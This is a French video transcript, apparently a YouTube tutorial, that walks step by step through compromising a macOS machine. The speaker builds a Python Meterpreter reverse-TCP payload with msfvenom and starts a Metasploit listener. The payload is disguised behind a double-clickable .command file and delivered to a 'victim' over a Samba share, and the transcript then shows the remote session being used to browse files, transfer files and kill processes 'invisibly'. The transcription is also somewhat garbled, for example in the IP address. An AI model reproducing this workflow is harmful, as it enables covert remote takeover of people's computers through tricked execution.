Bonjour à tous, aujourd'hui on se retrouve pour un nouveau tutoriel sur comment pirater un ordinateur sous Macintosh. Le système d'exploitation Macintosh n'est pas du tout hors de portée des virus ou autres payloads, et c'est tout simplement ce qu'on va voir aujourd'hui, donc avec un payload encodé en Python. Donc c'est comme la dernière fois, un meter-preter en reverse TCP, cette fois-ci en Python. Pour ce tutoriel, on va avoir notre habitué de la chaîne, notre Kali Linux qu'on ne présente plus, et une nouvelle machine virtuelle, donc un macOS X en version 10.10, donc Yosemite, qui est en fait un Hackintosh basé sur Darwin, puisque je n'ai pas réussi à obtenir macOS Sierra. Il faut savoir que sur mon PC, je dispose d'un processeur AMD et que c'est vraiment pas ce qui est conseillé pour faire de la virtualisation, surtout sur des Hackintosh. D'ailleurs, c'est pas pour rien que la plupart des serveurs chez des grosses marques sont à base d'Intel Xeon. Si vous souhaitez faire de la virtualisation, je vous encourage très vivement à prendre des processeurs de type Intel. Il y a les Kaby Lake qui viennent de sortir et je miserai beaucoup plus sur cela que sur les nouveaux Ryzen d'AMD. Donc, on retourne tout de suite sur notre machine sous Kali. J'ouvre un nouveau terminal et je vais tout de suite lancer la console MSF. Donc, en faisant un sudo msf console. Dans le même temps, j'ouvre un nouveau terminal afin de récupérer l'adresse IP de ma machine Kali sur le réseau. Pour cela, je fais un ifconfig. Ici, je suis avec mon interface filaire, donc ETH0, et je vois que mon adresse IP est 192.168.6644. Je vais la copier. J'ouvre un troisième terminal. Ce terminal-là me servira à créer mon payload. Je vais utiliser pour cela l'encodeur MSF Venom. On va pas le faire avec MSF Console cette fois-ci pour vous montrer un peu une façon différente de le créer. Ça reviendra exactement à la même chose, c'est juste la façon de procéder qui est différente. Et dans ce terminal-là, je vais lancer mon listener pour bien séparer les choses, pour bien séparer les actions afin que vous puissiez mieux comprendre. Dans le terminal qui va me permettre de créer mon payload, je vais commencer par me déplacer dans le répertoire par défaut de mon serveur Samba. Puisqu'une fois que j'aurai créé mon payload, je vais pouvoir l'envoyer à ma victime, donc sous macOS, via un partage Samba. Donc une fois qu'on est arrivé dans le répertoire de notre serveur Samba, il ne nous reste plus qu'à créer le payload, donc avec MSF Venom. Et pour cela, je vais utiliser la commande sudo msf Venom. L'option "-p" me permet de choisir l'encodeur à utiliser, donc ici ce sera du Python. Et comme on l'a dit tout à l'heure, ce sera un meter-preter en reverse TCP. Le lhost égale l'adresse IP de mon serveur d'écoute, donc c'est celle qu'on a copiée tout à l'heure, 6644. Lport égale le port que vous souhaitez, pourvu qu'il ne soit pas en cours d'utilisation. Et je redirige le flux de sortie avec un chevron vers un fichier qui s'appellera python.py, l'extension par défaut des fichiers Python. A partir de là, je n'ai plus qu'à appuyer sur Entrée pour que MSF Venom me génère notre payload. Dans le même temps, je vais retourner sur la console MSF afin d'allumer mon serveur d'écoute. Donc une fois que j'ai fait mon MSF console et que la console s'est bien lancée, je fais un use multi-handler. Je vais ensuite lui spécifier que mon payload est un Python en meter-preter reverse TCP, donc set payload Python meter-preter reverse TCP. Je lui spécifie cet lhost avec toujours l'adresse IP de mon serveur d'écoute 6644. Même chose, cet lport, c'est le même port que celui que j'ai mis ici, donc 4444. Et ensuite, je n'ai plus qu'à faire un exploit pour lancer le serveur d'écoute. Ici, pour les besoins de cette vidéo, pour que ce soit un peu plus choquant, un peu plus parlant pour vous, on va faire en sorte que notre machine sous macOS n'ait qu'à double-cliquer sur un fichier pour lancer justement ce payload en Python. Pour cela, je vais donc créer un fichier supplémentaire
donc qui nous permettra de lancer, comme un petit point .bat sous Windows par exemple, notre programme. Et donc ce sera en fait un fichier en .command qui permet en fait d'exécuter directement notre fichier dans le terminal de macOS. Alors pour créer notre fichier, je vais faire un sudo nano. Nano qui, je le rappelle, est un éditeur de texte en mode console. Donc il n'y a pas d'interface graphique, c'est directement dans le terminal. Donc sudo nano et le nom de mon fichier. Donc ici on va l'appeler processus.command. J'appuie sur Entrée et à partir de là, je vais pouvoir rentrer la commande qui nous permettra de lancer notre script Python. Et pour cela, tout simplement, ce sera Python et le chemin absolu vers le fichier à exécuter. Donc ici, on sait qu'on va envoyer notre payload via un serveur Samba. Donc automatiquement, la machine sous macOS va monter notre répertoire Samba dans le répertoire volume. Et ensuite, on va rentrer le nom de notre partage, donc ce sera processus, puis le nom du payload, donc tout simplement python.py. CTRL X pour quitter, j'appuie sur O pour enregistrer, le nouveau nom c'est toujours le même. Si je fais un ls dans le dossier, je vois que j'ai bien mon fichier en .command et mon payload en .py. Je fais un sudo chmod +x étoile pour rendre tout cela exécutable. Et à partir de maintenant, je vais faire un sudo /etc init.d smbd start pour lancer mon serveur Samba. Pour ceux qui ne comprennent pas cette commande, je vous encourage à regarder mon tuto sur comment monter un serveur Samba sur une machine Linux. À partir de là, tout est en place pour que je puisse prendre le contrôle de la machine sous Mac à distance. Et donc, je n'ai plus qu'à envoyer le lien à ma victime vers mon répertoire partagé de mon serveur Samba. Donc si je retourne sur ma machine sous OS X, j'ouvre un Finder. Je vais dans Aller, se connecter au serveur, je me connecte au serveur Samba disponible en 6644, je clique sur se connecter, j'attends patiemment que la phase d'authentification ait lieu, et ici je récupère bien mon fichier Python et le fichier .command. Et donc si je double-clique sur le fichier .command, mon listener va recevoir le reverse TCP. Hop, je clique sur Command. Ici, je vois que un terminal s'est ouvert et qu'une commande s'est exécutée. Et si je retourne sur ma machine sous Kali, je vois que j'ai un meter-prêteur qui est ouvert. Une fois la session ouverte, je fais un sysinfo pour savoir sur quelle machine je me trouve. Et ici, on voit que je suis sur admin-imac.local. Et donc, c'est une machine qui tourne avec un noyau Darwin en version 14. Donc, je suis bien sur le Mac de ma victime. Si je fais un ls, je peux voir le contenu de ces répertoires. Ça marche de la même façon que le reverse TCP qu'on avait fait sur ma dernière vidéo. Évidemment, vu qu'on est sous Mac, on a un peu moins de possibilités. Si je fais un help pour avoir la liste des commandes disponibles, on voit qu'on ne retrouve pas de commandes concernant les webcams, le stream, le keylog, etc. Mais c'est quand même assez complet puisque je peux killer des process, je peux upload et download des fichiers, donc c'est vraiment assez complet et il y a quand même de quoi prendre le contrôle de cette machine de façon totalement invisible. Voilà, c'est la fin de cette vidéo. N'hésitez pas à mettre un petit pouce bleu, à s'abonner à ma chaîne. N'oubliez pas que peu importe votre système d'exploitation, que vous soyez sous Linux, sous macOS ou Windows, aucun système n'est impénétrable et la meilleure des barrières, c'est le raisonnement humain. Bonne soirée!